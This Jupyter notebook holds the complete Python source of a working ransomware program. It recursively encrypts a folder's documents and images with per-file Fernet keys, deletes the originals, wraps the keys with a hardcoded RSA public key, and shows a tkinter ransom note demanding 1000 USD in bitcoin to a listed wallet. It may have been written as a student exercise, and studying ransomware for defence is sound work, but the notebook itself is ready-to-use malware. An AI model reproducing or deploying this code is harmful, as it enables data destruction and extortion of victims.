In [1]:
#import packages

import cryptography as crypto
from cryptography.fernet import Fernet
import os
from pathlib import Path



In [2]:
# define extensions which can be encrpted
extensions_list= ['.txt', '.jpg', '.jpeg', '.csv', '.doc', '.docx']


#get all files recursively starting from a start directory
file_list= [] 

def list_files_recursive(path_str='.'):
    for entry in os.listdir(path_str):
        full_path = os.path.join(path_str, entry)
        if os.path.isdir(full_path):
            list_files_recursive(full_path)
        elif(Path(full_path).suffix  in extensions_list):
                file_list.append(full_path)
    

# Specify the directory path you want to start from
directory_path = 'files'
list_files_recursive(directory_path)

file_list

['files\\important.jpg',
 'files\\important.txt',
 'files\\myFolder\\important_2.txt',
 'files\\myFolder\\moreFolder\\important.csv']

In [3]:
# encrypt all found files with fernet and associate them with AES KEY
encrypted_file_list= []
for file_name in file_list:
    key = Fernet.generate_key() 
    with open(file_name, 'rb') as file:
        content = file.read()
    fcrypt= Fernet(key)
    encrypted = fcrypt.encrypt(content)
    new_file_name= file_name+'.crypt'
    with open(new_file_name, 'wb+') as encrypted_file:
        encrypted_file.write(encrypted)
    os.remove(file_name)
    encrypted_file_list.append((new_file_name, key))

encrypted_file_list

[('files\\important.jpg.crypt',
  b'wsjphO7B6l1EGeFlfwEN33tcbtkTl-mVerpIbvMmlJg='),
 ('files\\important.txt.crypt',
  b'Je1JHkbReNgSWpMPO-EXZ3aD_imV-WN0PyxAjBB-iXQ='),
 ('files\\myFolder\\important_2.txt.crypt',
  b'M1VQhd7jLHz7j7L-nNa2k7V4RBrxlFfdRPeU3nW-MYA='),
 ('files\\myFolder\\moreFolder\\important.csv.crypt',
  b'qSqSIn-50VbglVRhraY7xG2i-8Xrgsad-ocPUmVYZmg=')]

In [4]:
#Used to generate RSA key. Commented out as keys will be provided

# from cryptography.hazmat.primitives.asymmetric import rsa
# from cryptography.hazmat.primitives import serialization

# # Generate private key
# private_key = rsa.generate_private_key(
#     public_exponent=65537,
#     key_size=2048
# )

# #  save the private key
# with open("private_key.pem", "wb") as f:
#     f.write(private_key.private_bytes(
#         encoding=serialization.Encoding.PEM,
#         format=serialization.PrivateFormat.TraditionalOpenSSL,
#         encryption_algorithm=serialization.NoEncryption()  # Change to password-based encryption if needed
#     ))

# # get public key from private key
# public_key = private_key.public_key()

# # save the public key
# with open("public_key.pem", "wb") as f:
#     f.write(public_key.public_bytes(
#         encoding=serialization.Encoding.PEM,
#         format=serialization.PublicFormat.SubjectPublicKeyInfo
#     ))




In [5]:
#hardcoded RSA public key loaded as bytestring

from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.serialization import load_pem_private_key, load_pem_public_key

# Load the public key for encryption
# with open("public_key.pem", "rb") as f:
#     public_key = load_pem_public_key(f.read())
    

# Load the private key for decryption
# with open("private_key.pem", "rb") as f:
#     private_key = load_pem_private_key(f.read(), password=None)


puk= b'-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAn5Q1jeRyb63iQ/6lZQWg\nb+p4hnRRbzAGJXIwip0z8g4dRo7U54vRkAwKa9+Agghb8DTLMO7fXxbDpY09Y7vR\nxgN2Ds579fdEuybh4PLhH+1wrr2ob6E8MZOsPTs4Dvill1LdRuiA7OjNELCq+uEC\nwg0tSsltBGm1dhv5+7NAxBcWvKk4Wl3u380Beht1YbgfD/FeY+FSYBKvB+xqONtq\nzBzCjL9kSz5nSNzMJfQ9O6wIe0p0obQlEXB2SsKkHz9OWnIuaPZ85PbkTOh00Kzi\nYKmVZ2LlHWr1aUE42dgoznaa2lPlkLewxlatjVHbD5uhdXaYRsq+hE87x5riED7e\n5wIDAQAB\n-----END PUBLIC KEY-----\n'
public_key = load_pem_public_key(puk)



In [6]:
# Define a function for encrypting AES keys using RSA public key

def encrypt_AES_keys(file_list):
    encrypted_file_list_RSA= []
    for file_key in file_list:
       
        ciphertext = public_key.encrypt(
            file_key[1],
            padding.OAEP(
                mgf=padding.MGF1(algorithm=hashes.SHA256()),
                algorithm=hashes.SHA256(),
                label=None
            )
        )  
        encrypted_file_list_RSA.append( (file_key[0],ciphertext.hex()))
    with open('./keys.dat', 'a+') as encrypted_keys:
        for tup in encrypted_file_list_RSA:
            encrypted_keys.write(tup[0])
            encrypted_keys.write(';')
            encrypted_keys.write(tup[1])
            encrypted_keys.write('|')
        


encrypt_AES_keys(encrypted_file_list)

# Encryption stops Here, below is logic for decryption using a private key if available

In [7]:
#Define function for decrypting cipher using Private key

def decrypt_RSA(f_list, private_key):
    decrypted_keys=[]
    for file_key in f_list: 
        plaintext = private_key.decrypt(
            file_key[1],
            padding.OAEP(
                mgf=padding.MGF1(algorithm=hashes.SHA256()),
                algorithm=hashes.SHA256(),
                label=None
            )
        )
        decrypted_keys.append((file_key[0], plaintext))
    
    return decrypted_keys



In [8]:
# Once AES keys are decrypted using RSA
# Resulting AES keys are used to decrypt all files ending in .crypt 

def decrypt_AES(encrypted_file_list):

    for file_pair in encrypted_file_list:
        file_name= file_pair[0]
        key= file_pair[1]
        fcrypt= Fernet(key)
        with open(file_name, 'rb') as enc_file:
            encrypted = enc_file.read()
        decrypted = fcrypt.decrypt(encrypted)
        
        with open(file_name[:-6], 'wb+') as dec_file:
            dec_file.write(decrypted)
        os.remove(file_name)

In [9]:
# Code for User Interface

import tkinter as tk
from tkinter import *
from tkinter import messagebox

root = Tk()


# define decrypt function if private_key.pem is in the current directory
# if private key not found, will show message
def DecryptCallBack():

    # Load the private key for decryption
    try:
        # Load the private key for decryption
        with open("private_key.pem", "rb") as f:
            private_key = load_pem_private_key(f.read(), password=None) 
    except:
         msg=messagebox.showinfo( "Nice try", "The private key wasn't found, make sure it's called private_key.pem and that you don't try a key we didn't send you")

    with open('./keys.dat', 'r+') as encrypted_keys:
       data= encrypted_keys.read()
       

    data= data.split('|')
    
    name_key_pair= []
    
    # decrypt the files
    
    for datum in data:
        if not datum:
            continue
        temp= datum.split(';')
        name_key_pair.append((temp[0], bytes.fromhex(temp[1])))
    result=decrypt_RSA(name_key_pair, private_key)
    decrypt_AES(result)

    os.remove('./keys.dat')

    msg=messagebox.showinfo( "Thanks", " Your files are back, Be careful next time")
    
  

# specify size of UI window.
root.geometry("700x300")

T = Text(root, height = 13, width = 70)


l = Label(root, text = "DO NOT PANIC")
l.config(font =("Courier", 17))

# Ransom note for user
prompt = """Your files are safe. If you want them back, send 1000 USD worth of bitcoin to the following wallet:

bc1q9v0j3l4k7t5w9x8y2m3c6r7z5h0d8n2f4g3p0v

Do not delete any of the generated files, as we cannot ensure the safety of your files if you do.

Once we have confirmed payment, you'll receive an email with the key file which you must put in the same directory as this program, Then click the DECRYPT button below.
You'll get all your files. Only press if you have received the file, do not touch any of the generated files and do not delete anything"""

# Create button for next text.
b1 = Button(root, text = "DECRYPT, ONLY PRESS IF YOU HAVE RECEIVED THE KEY",  command = DecryptCallBack )



l.pack()
T.pack()
b1.pack()


# Insert The Fact.
T.insert(tk.END, prompt)



tk.mainloop()